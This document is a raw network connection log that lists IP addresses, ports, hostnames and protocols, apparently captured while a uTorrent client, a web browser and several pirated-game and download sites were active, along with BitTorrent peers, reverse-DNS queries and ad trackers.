NL 178.162.173.227:28002 udp
ES 90.69.180.6:8621 udp
NL 46.232.210.34:64096 udp
CN 218.91.153.60:54266 udp
NL 192.42.116.242:54363 udp
DE 5.189.140.45:10019 udp
NL 5.79.93.242:18458 udp
CA 148.163.171.3:6881 udp
NL 95.99.60.125:65370 udp
FR 217.182.36.204:45397 udp
HK 183.178.204.120:20043 udp
NL 185.21.216.184:51317 udp
NL 37.48.89.158:43638 udp
RU 46.173.46.22:49001 udp
IT 2.238.196.203:6881 udp
FR 188.165.240.192:50967 udp
US 136.50.248.30:54832 udp
NL 95.211.198.83:28006 udp
US 195.137.220.189:6880 udp
GB 86.185.78.127:6889 udp
ES 185.245.176.112:34945 udp
SG 43.128.104.53:10020 udp
BR 45.4.34.139:25078 udp
DE 37.201.4.119:51119 udp
EG 41.234.69.52:50173 udp
US 3.214.87.95:80 i-49.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 46.236.115.84.in-addr.arpa udp
US 8.8.8.8:53 190.63.6.46.in-addr.arpa udp
ES 77.26.199.215:6881 udp
RU 185.17.131.3:11355 udp
FR 185.157.244.162:62222 udp
RU 93.157.22.190:1300 udp
US 8.8.8.8:53 115.238.56.119.in-addr.arpa udp
US 8.8.8.8:53 30.61.197.180.in-addr.arpa udp
US 8.8.8.8:53 74.197.116.37.in-addr.arpa udp
US 8.8.8.8:53 227.75.16.84.in-addr.arpa udp
US 8.8.8.8:53 125.115.249.2.in-addr.arpa udp
US 8.8.8.8:53 1.95.57.37.in-addr.arpa udp
US 8.8.8.8:53 12.146.30.125.in-addr.arpa udp
US 8.8.8.8:53 205.98.114.89.in-addr.arpa udp
US 8.8.8.8:53 109.74.210.62.in-addr.arpa udp
US 8.8.8.8:53 126.201.232.213.in-addr.arpa udp
US 8.8.8.8:53 138.15.108.131.in-addr.arpa udp
US 8.8.8.8:53 4.50.135.31.in-addr.arpa udp
US 8.8.8.8:53 78.126.215.83.in-addr.arpa udp
UA 109.162.44.71:33529 udp
SG 213.35.107.2:44227 udp
FR 91.165.47.54:42184 udp
NL 163.172.220.50:16754 udp
US 8.8.8.8:53 157.139.248.177.in-addr.arpa udp
US 8.8.8.8:53 216.76.233.1.in-addr.arpa udp
US 8.8.8.8:53 49.100.106.187.in-addr.arpa udp
US 8.8.8.8:53 222.32.151.88.in-addr.arpa udp
US 8.8.8.8:53 227.173.162.178.in-addr.arpa udp
US 8.8.8.8:53 6.180.69.90.in-addr.arpa udp
US 8.8.8.8:53 60.153.91.218.in-addr.arpa udp
US 8.8.8.8:53 242.116.42.192.in-addr.arpa udp
US 8.8.8.8:53 45.140.189.5.in-addr.arpa udp
US 8.8.8.8:53 242.93.79.5.in-addr.arpa udp
US 8.8.8.8:53 3.171.163.148.in-addr.arpa udp
US 8.8.8.8:53 125.60.99.95.in-addr.arpa udp
US 8.8.8.8:53 204.36.182.217.in-addr.arpa udp
US 8.8.8.8:53 120.204.178.183.in-addr.arpa udp
US 8.8.8.8:53 184.216.21.185.in-addr.arpa udp
US 8.8.8.8:53 158.89.48.37.in-addr.arpa udp
US 8.8.8.8:53 22.46.173.46.in-addr.arpa udp
US 8.8.8.8:53 203.196.238.2.in-addr.arpa udp
US 8.8.8.8:53 192.240.165.188.in-addr.arpa udp
US 8.8.8.8:53 30.248.50.136.in-addr.arpa udp
US 8.8.8.8:53 83.198.211.95.in-addr.arpa udp
US 8.8.8.8:53 189.220.137.195.in-addr.arpa udp
US 8.8.8.8:53 127.78.185.86.in-addr.arpa udp
RU 109.173.74.152:60284 udp
GB 87.248.204.1:80 video.rainberrytv.com tcp
RU 83.234.203.10:11488 udp
PA 190.141.43.16:37013 udp
KR 125.240.34.205:8103 udp
ES 185.13.202.152:4760 udp
GT 181.174.67.87:62638 udp
MX 187.153.66.197:16813 udp
BO 45.70.183.22:60378 udp
CA 67.225.54.132:40041 udp
DE 91.96.241.193:6881 udp
GB 87.248.204.1:80 video.rainberrytv.com tcp
GB 181.215.176.83:7646 udp
CN 220.180.167.230:15000 udp
RU 95.24.69.128:4861 udp
US 44.196.243.250:80 i-64.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 71.44.162.109.in-addr.arpa udp
US 8.8.8.8:53 2.107.35.213.in-addr.arpa udp
US 8.8.8.8:53 54.47.165.91.in-addr.arpa udp
US 8.8.8.8:53 50.220.172.163.in-addr.arpa udp
US 8.8.8.8:53 152.74.173.109.in-addr.arpa udp
US 8.8.8.8:53 16.43.141.190.in-addr.arpa udp
US 8.8.8.8:53 10.203.234.83.in-addr.arpa udp
US 8.8.8.8:53 205.34.240.125.in-addr.arpa udp
US 8.8.8.8:53 152.202.13.185.in-addr.arpa udp
US 8.8.8.8:53 1.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 87.67.174.181.in-addr.arpa udp
US 8.8.8.8:53 197.66.153.187.in-addr.arpa udp
US 8.8.8.8:53 22.183.70.45.in-addr.arpa udp
US 8.8.8.8:53 132.54.225.67.in-addr.arpa udp
US 8.8.8.8:53 193.241.96.91.in-addr.arpa udp
US 8.8.8.8:53 83.176.215.181.in-addr.arpa udp
US 8.8.8.8:53 230.167.180.220.in-addr.arpa udp
US 8.8.8.8:53 128.69.24.95.in-addr.arpa udp
RU 185.134.120.172:6881 udp
FR 94.23.215.83:6882 udp
NL 95.179.136.151:11158 udp
MX 187.246.249.11:53939 udp
CN 182.136.186.223:25604 udp
KR 121.144.127.220:6881 udp
IQ 37.239.68.18:49397 udp
CH 193.32.127.220:46779 udp
US 44.196.243.250:80 i-29.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 220.127.144.121.in-addr.arpa udp
US 8.8.8.8:53 18.68.239.37.in-addr.arpa udp
US 8.8.8.8:53 220.127.32.193.in-addr.arpa udp
GB 87.248.204.1:443 cdn.bitmedianetwork.com tcp
GB 87.248.204.1:443 cdn.bitmedianetwork.com tcp
US 44.196.243.250:80 i-62.b-47142.ut.bench.utorrent.com tcp
US 3.165.232.71:80 utclient.utorrent.com tcp
US 3.165.232.71:80 utclient.utorrent.com tcp
US 98.143.146.7:80 utorrent.com tcp
US 98.143.146.7:80 utorrent.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
US 98.143.146.7:80 utorrent.com tcp
US 34.196.244.100:80 i-62.b-47142.ut.bench.utorrent.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
IN 49.47.132.18:53813 udp
IN 47.9.130.197:43453 udp
SG 121.6.183.22:6881 udp
US 18.223.137.220:6881 udp
US 54.214.62.31:6881 udp
US 13.58.27.33:6881 udp
US 54.214.62.55:6881 udp
PL 31.0.177.193:11730 udp
ID 103.162.63.75:1086 udp
TH 49.228.121.156:22351 udp
IN 223.227.120.14:23186 udp
BR 167.250.139.10:7867 udp
HU 79.122.75.10:41824 udp
BR 179.106.75.10:44572 udp
IN 49.204.141.221:40830 udp
RU 109.161.37.136:6881 udp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
US 3.165.232.71:80 utclient.utorrent.com tcp
US 3.165.232.71:80 utclient.utorrent.com tcp
US 3.165.232.71:80 utclient.utorrent.com tcp
IE 3.162.140.86:80 www.utorrent.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 31.62.214.54.in-addr.arpa udp
US 8.8.8.8:53 220.137.223.18.in-addr.arpa udp
US 8.8.8.8:53 33.27.58.13.in-addr.arpa udp
US 8.8.8.8:53 55.62.214.54.in-addr.arpa udp
US 8.8.8.8:53 193.177.0.31.in-addr.arpa udp
US 8.8.8.8:53 75.63.162.103.in-addr.arpa udp
US 8.8.8.8:53 156.121.228.49.in-addr.arpa udp
US 8.8.8.8:53 14.120.227.223.in-addr.arpa udp
US 8.8.8.8:53 10.139.250.167.in-addr.arpa udp
US 8.8.8.8:53 10.75.122.79.in-addr.arpa udp
US 8.8.8.8:53 10.75.106.179.in-addr.arpa udp
US 8.8.8.8:53 221.141.204.49.in-addr.arpa udp
US 8.8.8.8:53 100.244.196.34.in-addr.arpa udp
US 8.8.8.8:53 136.37.161.109.in-addr.arpa udp
GB 172.217.169.46:443 www.googleoptimize.com tcp
GB 216.58.212.234:80 fonts.googleapis.com tcp
US 34.192.104.143:80 i-31.b-47142.ut.bench.utorrent.com tcp
IE 3.162.140.86:443 www.utorrent.com tcp
GB 88.221.134.232:443 ced.sascdn.com tcp
GB 172.217.16.227:80 fonts.gstatic.com tcp
US 34.192.104.143:80 i-31.b-47142.ut.bench.utorrent.com tcp
GB 216.58.204.78:80 www.youtube.com tcp
US 44.197.0.133:443 i-31.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-31.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-31.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-31.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-31.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-31.b-47142.ut.bench.utorrent.com tcp
IE 3.162.140.86:443 www.utorrent.com tcp
GB 2.18.108.192:443 ads.pubmatic.com tcp
US 104.22.53.86:443 cdn.id5-sync.com tcp
IE 3.162.140.25:443 sdk.privacy-center.org tcp
US 34.196.244.100:80 i-31.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:80 i-31.b-47142.ut.bench.utorrent.com tcp
US 16.182.99.149:80 utclient-staging.utorrent.com tcp
US 34.196.244.100:80 i-31.b-47142.ut.bench.utorrent.com tcp
US 16.182.99.149:80 utclient-staging.utorrent.com tcp
US 54.70.28.180:6881 udp
HN 181.115.118.19:5816 udp
BR 187.13.43.187:6881 udp
CN 114.226.84.242:51413 udp
BR 167.249.130.197:50321 udp
US 75.113.169.118:59161 udp
CN 111.121.48.248:17027 udp
US 67.185.69.209:6881 udp
KR 175.125.25.148:41114 udp
UA 193.194.110.164:47442 udp
DZ 41.107.157.160:38020 udp
IL 5.29.8.123:28324 udp
BR 179.233.4.224:50321 udp
NZ 161.29.140.189:11736 udp
CN 123.132.253.152:53613 udp
US 198.210.116.188:6881 udp
RU 95.24.197.128:49429 udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 25.140.162.3.in-addr.arpa udp
US 8.8.8.8:53 133.0.197.44.in-addr.arpa udp
US 8.8.8.8:53 180.28.70.54.in-addr.arpa udp
US 8.8.8.8:53 19.118.115.181.in-addr.arpa udp
US 8.8.8.8:53 149.99.182.16.in-addr.arpa udp
US 8.8.8.8:53 187.43.13.187.in-addr.arpa udp
US 8.8.8.8:53 242.84.226.114.in-addr.arpa udp
US 8.8.8.8:53 197.130.249.167.in-addr.arpa udp
US 8.8.8.8:53 118.169.113.75.in-addr.arpa udp
US 8.8.8.8:53 248.48.121.111.in-addr.arpa udp
US 8.8.8.8:53 209.69.185.67.in-addr.arpa udp
US 8.8.8.8:53 148.25.125.175.in-addr.arpa udp
US 8.8.8.8:53 164.110.194.193.in-addr.arpa udp
US 8.8.8.8:53 160.157.107.41.in-addr.arpa udp
US 8.8.8.8:53 123.8.29.5.in-addr.arpa udp
US 8.8.8.8:53 224.4.233.179.in-addr.arpa udp
US 8.8.8.8:53 189.140.29.161.in-addr.arpa udp
US 8.8.8.8:53 152.253.132.123.in-addr.arpa udp
US 8.8.8.8:53 188.116.210.198.in-addr.arpa udp
US 8.8.8.8:53 128.197.24.95.in-addr.arpa udp
US 216.239.32.36:443 region1.google-analytics.com tcp
IE 3.162.140.25:443 sdk.privacy-center.org tcp
GB 2.18.190.136:443 p.typekit.net tcp
RU 5.18.177.86:19638 udp
RU 185.34.241.86:52065 udp
US 73.197.126.217:49865 udp
KR 1.241.37.136:6882 udp
CN 221.178.195.80:15000 udp
PE 179.6.164.26:24226 udp
BR 181.233.17.201:1831 udp
BR 179.96.129.111:40331 udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 35.171.49.86:6992 udp
CO 181.59.2.82:2924 udp
US 54.70.174.84:6881 udp
RU 95.183.126.78:6881 udp
KR 1.248.139.157:6881 udp
VN 115.79.74.15:49176 udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 111.129.96.179.in-addr.arpa udp
US 8.8.8.8:53 78.126.183.95.in-addr.arpa udp
US 8.8.8.8:53 157.139.248.1.in-addr.arpa udp
US 8.8.8.8:53 15.74.79.115.in-addr.arpa udp
US 8.8.4.4:443 dns.google udp
NL 89.149.192.193:443 www9.smartadserver.com tcp
NL 89.149.192.193:443 tcp
N/A 224.0.0.251:5353 udp
CN 223.107.204.79:23750 udp
MX 187.226.63.75:48032 udp
CN 171.43.204.79:35715 udp
NL 89.149.192.193:443 www9.smartadserver.com tcp
US 157.131.246.19:20120 udp
PT 109.51.118.19:6881 udp
US 66.201.135.23:9010 udp
VE 186.92.189.234:64643 udp
BR 181.174.222.70:65021 udp
US 204.79.197.239:443 tcp
IQ 185.136.148.111:14596 udp
FR 109.190.193.180:53443 udp
BR 179.215.96.34:2329 udp
RU 37.194.113.86:6881 udp
CO 201.219.194.82:20518 udp
AZ 185.146.113.86:59197 udp
US 172.67.10.107:443 images.atmequiz.com tcp
US 172.67.10.107:443 images.atmequiz.com tcp
N/A 10.127.0.42:50993 tcp
GB 142.250.200.2:443 securepubads.g.doubleclick.net tcp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 209.127.134.241:31026 udp
MN 103.212.119.129:15116 udp
DE 38.242.237.39:6881 udp
CN 182.118.46.36:40207 udp
GB 142.250.200.2:443 securepubads.g.doubleclick.net udp
US 151.101.193.44:443 videos.taboola.com tcp
US 13.107.246.64:443 www.clarity.ms tcp
US 216.239.32.36:443 region1.google-analytics.com udp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
NL 178.250.1.11:443 gum.criteo.com tcp
RU 185.3.182.19:2313 udp
DZ 197.207.217.3:38772 udp
NL 178.250.1.25:443 csm.nl3.eu.criteo.net tcp
US 97.115.238.137:51413 udp
MX 177.245.152.152:35689 udp
IE 13.74.129.1:443 c.clarity.ms tcp
NL 185.235.87.191:443 ag.gbc.criteo.com tcp
FR 178.250.7.13:443 dnacdn.net tcp
FR 185.235.86.251:443 gem.gbc.criteo.com tcp
GB 87.248.204.1:80 video.rainberrytv.com tcp
GB 87.248.204.1:80 video.rainberrytv.com tcp
US 13.107.21.237:443 c.bing.com tcp
US 4.227.249.197:443 u.clarity.ms tcp
NL 141.226.228.48:443 am-trc-events.taboola.com tcp
NL 141.226.228.48:443 am-trc-events.taboola.com tcp
NL 141.226.228.48:443 am-trc-events.taboola.com tcp
US 172.67.10.107:443 images.atmequiz.com tcp
MX 177.245.153.165:3461 udp
NL 185.89.210.82:443 ib.adnxs.com tcp
IE 20.47.117.32:443 www.temu.com tcp
US 141.226.224.32:443 cds.taboola.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
IE 18.66.171.73:443 api.privacy-center.org tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
IS 82.221.103.245:80 update.utorrent.li tcp
US 104.16.213.94:443 media.adaware.com tcp
GB 87.248.204.1:80 video.rainberrytv.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
IS 82.221.103.246:80 update.utorrent.li tcp
US 3.165.232.11:80 utclient.utorrent.com tcp
GB 87.248.205.1:80 video.rainberrytv.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 18.213.206.169:443 ledger.bt.co tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.194.83.192:443 airdrop.bt.co tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
N/A 127.0.0.1:10702 tcp
NL 178.250.1.25:443 csm.nl3.eu.criteo.net tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
GB 95.101.143.219:443 www.bing.com tcp
US 52.204.42.239:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 3.210.17.85:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 172.67.218.22:80 skidrowgamereloaded.co tcp
US 172.67.218.22:80 skidrowgamereloaded.co tcp
US 172.67.218.22:443 skidrowgamereloaded.co tcp
GB 172.217.16.228:443 www.google.com tcp
US 172.64.147.188:443 kit.fontawesome.com tcp
GB 142.250.187.238:443 google.com tcp
GB 142.250.187.238:443 google.com udp
RU 88.212.201.204:443 counter.yadro.ru tcp
GB 142.250.200.22:443 i.ytimg.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
US 172.67.139.119:443 ka-f.fontawesome.com tcp
GB 172.217.169.2:443 googleads.g.doubleclick.net tcp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.169.74:443 jnn-pa.googleapis.com tcp
GB 142.250.200.38:443 static.doubleclick.net tcp
GB 142.250.200.33:443 yt3.ggpht.com tcp
GB 172.217.169.74:443 jnn-pa.googleapis.com udp
GB 142.250.187.206:443 play.google.com tcp
GB 142.250.187.206:443 play.google.com udp
US 8.8.4.4:443 dns.google udp
US 204.79.197.239:443 tcp
GB 23.73.139.43:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 172.67.159.189:443 gamecloudshare.uno tcp
US 172.67.159.189:443 gamecloudshare.uno tcp
US 104.19.230.21:443 api.hcaptcha.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 104.19.229.21:443 api.hcaptcha.com tcp
GB 142.250.187.206:443 play.google.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.16.228:443 www.google.com udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
GB 142.250.187.238:443 google.com udp
US 172.67.222.15:443 playsafedownloads.space tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.169.34:443 googleads.g.doubleclick.net udp
UA 109.110.71.145:1665 udp
RU 91.203.8.137:6881 udp
RU 109.74.222.35:41937 udp
US 73.249.2.31:6881 udp
US 8.8.4.4:443 dns.google udp
NL 81.17.55.113:443 www9.smartadserver.com tcp
US 131.153.148.2:443 tcp
US 185.167.164.53:443 tcp
GB 87.248.204.1:443 video.rainberrytv.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 131.153.148.2:443 tcp
US 185.167.164.53:443 tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
NL 81.17.55.113:443 www9.smartadserver.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
RU 217.15.128.212:7092 udp
NL 83.87.169.48:31958 udp
UA 91.235.196.195:20563 udp
RU 5.187.87.207:35128 udp
US 107.115.178.97:37602 udp
GB 142.250.187.238:443 google.com udp
KR 121.170.20.76:44147 udp
RU 79.165.35.124:6881 udp
CN 222.247.225.100:9786 udp
BR 177.159.78.125:6881 udp
KR 121.128.144.252:6881 udp
US 23.125.130.131:49178 udp
NL 91.199.227.105:11129 udp
RU 46.50.137.9:51413 udp
DE 93.192.236.148:51413 udp
CN 101.93.81.143:8706 udp
ES 87.218.92.87:6889 udp
AU 157.211.252.95:11439 udp
IS 31.209.235.182:50321 udp
US 8.8.4.4:443 dns.google udp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
GB 87.248.204.1:443 video.rainberrytv.com tcp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.196.243.250:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:443 i-38.b-47142.ut.bench.utorrent.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
CN 111.19.60.107:34753 udp
GB 95.101.143.219:443 www.bing.com tcp
GB 95.101.143.219:443 www.bing.com tcp
BR 191.177.173.147:3151 udp
KR 121.150.12.18:7973 udp
GB 142.250.187.238:443 google.com udp
NL 185.107.44.203:49565 udp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 44.197.0.133:80 i-38.b-47142.ut.bench.utorrent.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
FR 5.135.209.97:443 www9.smartadserver.com tcp
KR 115.40.161.85:40841 udp
IT 151.84.66.15:6881 udp
BR 179.48.204.224:51400 udp
RU 185.97.201.209:11569 udp
IS 185.191.232.75:44636 udp
NL 178.162.174.11:28007 udp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
CN 221.219.96.184:51414 udp
US 8.8.8.8:53 skidrowgamereloaded.co udp
US 172.67.218.22:443 skidrowgamereloaded.co tcp
BR 200.193.111.23:53288 udp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
ID 36.85.222.58:10837 udp
US 172.67.192.10:80 start7345724.ru tcp
US 8.8.8.8:53 api-torrent.ru udp
NL 104.192.42.148:443 api-torrent.ru tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 172.67.192.10:80 start7345724.ru tcp
US 8.8.8.8:53 58.222.85.36.in-addr.arpa udp
US 8.8.8.8:53 148.42.192.104.in-addr.arpa udp
US 104.21.87.238:443 fold.hibiscusespears.com tcp
US 172.67.192.10:80 start7345724.ru tcp
RU 95.163.241.63:80 95.163.241.63 tcp
SE 185.117.88.231:80 bobisawinner.xyz tcp
US 8.8.8.8:53 63.241.163.95.in-addr.arpa udp
SE 185.117.88.231:80 bobisawinner.xyz tcp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
RU 178.71.116.242:6881 udp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 185.26.182.123:443 autoupdate.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.47:443 autoupdate.geo.opera.com tcp
NL 82.145.216.16:443 features.opera-api2.com tcp
US 104.18.25.17:443 api.config.opr.gg tcp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 17.25.18.104.in-addr.arpa udp
NL 82.145.216.49:443 download.opera.com tcp
US 172.67.192.10:80 start7345724.ru tcp
US 104.18.10.89:443 download5.operacdn.com tcp
SE 81.226.111.18:6881 udp
US 8.8.4.4:443 dns.google udp
BR 200.193.105.50:50321 udp
GB 87.248.205.1:443 video.rainberrytv.com tcp
GB 87.248.205.1:443 video.rainberrytv.com tcp
GB 87.248.205.1:443 video.rainberrytv.com tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 exodus.desync.com udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 3.214.87.95:80 i-38.b-47142.ut.bench.utorrent.com tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav.smartscreen.microsoft.com tcp
GB 95.101.143.176:443 download3.operacdn.com tcp
NL 104.192.42.148:443 api-torrent.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
US 172.67.192.10:80 start7345724.ru tcp
KR 118.42.45.204:33001 udp
US 3.214.87.95:80 i-72.b-47142.ut.bench.utorrent.com tcp
US 3.214.87.95:80 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 34.196.244.100:443 i-72.b-47142.ut.bench.utorrent.com tcp
US 208.67.222.222:53 83.176.215.181.in-addr.arpa udp
US 199.59.243.227:6969 9.rarbg.me udp
FR 5.196.111.64:443 www9.smartadserver.com tcp
FR 5.196.111.64:443 www9.smartadserver.com tcp
US 8.8.8.8:53 227.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 64.111.196.5.in-addr.arpa udp
US 44.197.0.133:80 i-72.b-47142.ut.bench.utorrent.com tcp
PH 49.149.91.29:1067 udp
GB 86.26.0.9:47263 udp
BR 179.108.91.132:55404 udp
BR 186.205.17.139:5350 udp
N/A 239.192.152.143:6771 udp
MY 14.192.213.215:12147 udp
NL 46.232.211.200:24259 udp
NL 176.56.239.28:6774 udp
PL 89.64.29.38:50042 udp
UA 31.133.61.47:2314 udp
NL 95.211.110.228:28010 udp
AU 101.177.69.77:6881 udp
CL 186.10.170.97:1337 tracker.internetwarriors.net udp
NL 143.179.179.57:49001 udp
HK 125.59.194.159:11237 udp
NL 193.23.249.199:50171 udp
IT 93.47.37.25:6983 udp
SG 43.133.62.119:15000 udp
IT 95.231.184.71:52153 udp
BR 177.4.122.103:37321 udp
HK 119.236.124.76:49001 udp
SI 89.142.16.194:49001 udp
KR 121.173.203.128:40877 udp
CN 125.37.189.34:41700 udp
IL 5.29.9.99:40022 udp
US 75.103.160.164:56294 udp
IN 157.38.116.237:50249 udp
CN 120.232.79.248:2063 udp
BR 45.233.81.244:44698 udp
ES 95.17.53.127:20022 udp
EG 41.47.7.233:52057 udp
US 8.8.8.8:53 139.17.205.186.in-addr.arpa udp
US 8.8.8.8:53 143.152.192.239.in-addr.arpa udp
US 8.8.8.8:53 215.213.192.14.in-addr.arpa udp
US 8.8.8.8:53 200.211.232.46.in-addr.arpa udp
US 8.8.8.8:53 28.239.56.176.in-addr.arpa udp
US 8.8.8.8:53 38.29.64.89.in-addr.arpa udp
US 8.8.8.8:53 47.61.133.31.in-addr.arpa udp
US 8.8.8.8:53 228.110.211.95.in-addr.arpa udp
US 8.8.8.8:53 77.69.177.101.in-addr.arpa udp
US 8.8.8.8:53 97.170.10.186.in-addr.arpa udp
